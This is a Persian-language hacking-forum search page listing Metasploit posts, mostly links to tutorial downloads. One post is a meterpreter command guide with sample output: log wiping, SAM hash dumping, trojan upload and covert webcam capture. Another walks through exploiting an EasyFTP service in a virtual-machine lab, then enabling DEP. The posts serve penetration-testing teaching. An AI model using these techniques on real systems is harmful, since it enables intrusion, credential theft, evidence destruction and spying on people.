ts icon
سرور تیم اسپیک گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'metasploit'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

10 نتیجه پیدا شد

  1. همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم : HELP این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه : meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید : meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... CAT مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده : meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt guardiran digital security team CD and PWD این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه : meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن : meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... DOWNLOAD موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون : meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini EDIT با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم : meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt EXECUTE با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم : meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> GETUID با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه : meterpreter > getuid Server username: NT AUTHORITY\SYSTEM HASHDUMP با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم : meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: IDLETIME این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده : meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs IPCONFIG این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده : meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 LPWD and LCD این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید : meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www LS مثل نمونه شل برای لیست کردن فهرست استفاده میشه : meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2019 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2019 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2019 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2019 Application Data ...snip... PS این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره : meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... SEARCH همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال : meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) SHELL با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم : meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> UPLOAD موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون : meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe WEBCAM_LIST با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم : meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) WEBCAM_SNAP در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم : meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
  2. درود به اعضای محترم گارد ایران طبق قولی که دادم تاپیک های آموزشیم رو اول با آموزش هک ویندوز با متااسپلویت از پایه تا پیشرفته (مثل روش ها و بایپس های آنتی ویروس , UAC و ...) شروع می کنم. خب اولین آموزش ,آموزش مقدماتی هک ویندوز 7 هست (در ویندوز 8 و 10 هم هیچ فرقی نمی کنه) . نکته: به منظور یکپارچه بودن آموزش ها , از قرار دادن هر گونه پست به منظور سوال , اسپم و . . . خودداری کنید. سوال شما پاسخ داده نخواهد شد و پست شما حذف خواهد شد و درصورت تکرار اخطار داده می شود و فقط سوالات خود را در تاپیک مربوطه یا از طریق پیام خصوصی مطرح کنید. با تشکر حجم فشرده : 41mg کیفیت: عالی پسورد فایل ها : guardiran.org metasploit_win7_hack.part01.rar metasploit_win7_hack.part02.rar metasploit_win7_hack.part03.rar
  3. با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست.
  4. با عرض سلام به عزیزان گارد ایران با آمورش نصب متاسپلویت در اوبونتو در خدمت شما هستیم برای نصب متاسپلویت د روش وجود داره ۱-نصب از طریث فایل نصبی که میشه از سایت اصلی دانلود کرد ۲-استفاده از ترمینال و استفاده و کامند ها(برای این کار نیازه که مخازن کالی لینوکس رو در اوبونتو ذخیره سازی کرد,برای اینکار به صورت خودکار میتونید از ابزار کاتولین استفاده کنید که آموزش نصبش قبلا قرار گرفته) خوب ما در این آموزش از ترمینال برای نصب استفاده میکنیم امیدوارم مفید بوده باشه موفق باشید install_metasploit.part1.rar install metasploit.part2.rar
  5. s9py

    Metasploit Unleashed Offline

    درود بر شما ضمن تبریک عید , این مجموعه رو به عنوان یک عیدی ناقابل به شما تقدیم می کنم. همونطور که می دونید Metasploit Unleashed منبع اصلی آموزش ها و مطالب متااسپلویت می باشد که برای دانلود و استفاده بصورت Offline برای شما تهیه شده. حجم فشرده: 19mg پسورد: guardiran.org Metaslpoit-Unleashed.part1.rar Metaslpoit-Unleashed.part2.rar Metaslpoit-Unleashed.part3.rar
  6. همون طور که به یکی ازدوستان قول داده بودم اموزش حمله با کالی به ویندوز سروری که هر دو روی ماشین مجازی نصب شده بودند رو گذاشتم سیستم اصلی ما یعنی همون سیستمی که ماشین مجازی روش نصبه ویندوز 7 هست دوستان این ترجمه وقت گرفت و از اونجایی که اولین بار که یه چنین نوع حمله ای به فارسی گذاشته میشه خواهشا ببخشید اگه مشکلی داره ولی خواهشا اسپم الکی ندید اگه سوالی بود در قسمت سوال و جواب بپرسید و خواهشا تشکر یادتون نره تارگت ما ویندوز سرور 2008 که روی ماسین مجازی نصب شده و سیستم اتکر هم کالی 2.0 هست که اونم روی ماشین مجازی نصب شده نکته بسیار مهم اینه که باید هر دو روی حالت bridge networking باشند با دستور ipconfig ای پی ویندوز رو بگیرید خب حالا آرمیتیج رو در کالی باز کنید در قسمت کانکت ، کانکت رو قبول کنید و استارت متااسپلویت رو بزنید خب در آرمیتیج روی hosts , nmapsacn , intensescan کلیک کنید تا صفحه ای باز بشه بعد ای پی ویندوز رو که گرفته بودید بنویسد و یه 32/ به اخرش اضافه کنید اسکن چند دقیقه طول میکشد و زمانی که با پیغام scan complete روبه رو شدید روی ok کلیک کنید و تارگت در صفحه ارمیتیج نشان داده میشود اکسپلویت کردن تارگت با easyftp_cwd_fixret attack در گوشه چپ آرمیتیج در قسمت سرچ بنویسید easyftp حالا روی easyftp_cwd_fixret نگه دارید و اون رو روی تارگت بذارید صفحه اتک به همراه مشخصات مربوطه باز میشود خب حالا گزینه9 windows universal v1.7.0.11 انتخاب و لانچ کنید ارور:اگه اررور کانکشن روبه رو شدید معمولا بخاطر از کار اقتادن easyftp هست برای درست کردنش روی ویندوز سرور استارت رو بزنید و بنویسید sevices حالا easyftp رو ریستارت کنید درپایین ویندوز اصلی دسکتاپ کلیک کنید حالا printscan کیبرد رو فشار بدهید و حالا میبیند که دسکتاپ به clipboard کپی میشه روی ویندوز اصلی منوی استارت رو باز کنید و mspaint رو سرچ کنید و cntrl+v رو بزنید حالا فایل رو ذخیره کنید حالا روی ایکون تارگت راست کلیک کنید و به ترتیب meterpreter, explore, screenshot بروید برای جلوگیری از این حمله ما باید data execution protection (DEP) رو فعال کنیم در ویندوز تارگت در استارت روی computer راست کلیک کنید و properties رو باز کنید به advanced system setting بروید در قسمت system properties به advanced بروید در قسمت performance روی settings کلیک کنید و حالا به صفحه data execution prevention بروید و DEP را فعال کنید حالا ویندوز تارگت رو ریستارت کنید حالا با نام administrator و با پسورد p@ssw0rd لاگین شین و دوباره در ارمیتیج easyftp_cwd_fixret رو مانند بالا اجرا کنید و مراحل قبلی را طی کنید و لانچ را بزنید حال در تارگت وارد صفحه microsoft windows شوید و با پیغامی به شکل ftpbasicsvr.exe has stopped working این یعنی DEP عمل کرد و سرور شما رو با قطع کردن اتک نجات داد منابع:samsclass.info fastandeasyhacking.com
  7. به نام خدا سلام خدمت همه دوستان عزيزم در تيم امنيتي گارد ايران امروز استارت پروژه اي رو با كمك شما دوستان خواهيم زد كه به حول و قوه الهي يكي از پربارترين آموزشهاي انجمن تا اينجا ميتونه باشه همونطور كه قبلا هم گفته بودم يه تاپيك براي آموزش صفر تا صد متااسپلويت كم بود كه الان اضافه شده تاپيك هاي قبلي چون خيلي به صورت پخش مطالب رو گفته بودن، بنده با مشورت با مديريت كل انجمن تصميم به ايجاد اين تاپيك گرفتم. اگه وقت بشه و تعداد تشكرها زياد باشه، يه سري از اكسپلويت هاي priv8 هم ميذارم برا دوستان كه استفاده كنن درضمن همه آموزشها داراي صداي واضح بنده هستن(ببخشيد اگه صدام خوب نيست) و اختصاصي براي تيم امنيتي گارد ايران توليد و تنظيم شده است. نكته ديگه اينه كه اين آموزش ها احتمالا از 20 كليپ فراتر ميره و نيازمند صبر كامل شماست اما در آخر اين دوره آموزشي، شما به طور كامل كنسول متااسپلويت رو ياد خواهيد گرفت. و در آخر؛ آموزشها در محيط كالي لينوكس انجام ميشود كه ميتونيد از سايت كالي ، آخرين نسخه اين سيستم عامل محبوب رو دريافت كنيد. اگر نظر یا پیشنهادی داشتین با پیام خصوصی با بنده در ارتباط باشین. برای پرسش سوالات خود به بخش سوال و جواب های عمومی مراجعه کنید. لطفا اسپم ندید با تشکر
  8. با سلام خدمت شما دوستان گرامی در این تاپیک اموزشی میخوام کتاب هایی که در مورد متاسپلویت ترجمه شدن رو قرار بدم تا شما دوستان نیز بتونین از اون ها بهره ی کافی رو ببرین در این کتاب شما با مفاهیم اولیه و روش های کار با متاسپلویت اشنا میشین .... دوستان فقط همه ی پارت ها رو دانلود کنین ودر یک پوشه extract کنین تا فایل روبراتون بیاره این کتاب یکی از بهترین راهنما هایی هست که به زبان فارسی برای شما دوستان ترجمه شده امیدوارم که ازش حداکثر استفاده رو ببرین ......از دست ندین این یکی رو که واقعا میدونم به کارتون میخوره.... تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد کتاب ها ومقالات بهتر و جدید تری را با شما به اشتراک خواهم داد پسورد فایــل : guardiran.org با تشکر از شما دوستان گرامی metasploit-learn.part1.rar metasploit-learn.part2.rar metasploit-learn.part3.rar
  9. در این فیلم آموزشی شمارو با دستورات پایه ای و مهم متاسپلویت Metasploit که برای کامپایل اکسپلویت ( اجرا کردن Exploit ) بکار میره آشنا می کنم و جهت آشنایی دوستانی که با متاسپلویت کار نکردن و آشنایی ندارند باید عرض کنم این دستورات در تمامیه مراحل کار با Metasploit بکارتون میاد و تنظیمات مربوط به ابزارها و اسکنرها و.. در متاسپلویت توسط این دستورات انجام می گیره . فیبم با توضیحات کامل ضبط کردم و حدود 4 دقیقه هست و در این آموزش با مثال عملی پیش میریم تا درک مطالب راحت باشه . پسورد فایل : guardiran.org . Metasploit Command Tutorial.rar
  10. در این فیلم به شما آموزش میدم تا بتونید توسط متاسپلویت , Enumeration DNS را انجام بدین ( جمع آوری اطلاعات از DNS قربانی ) پسورد فایل : guardiran.org Dns_enum Metasploit.rar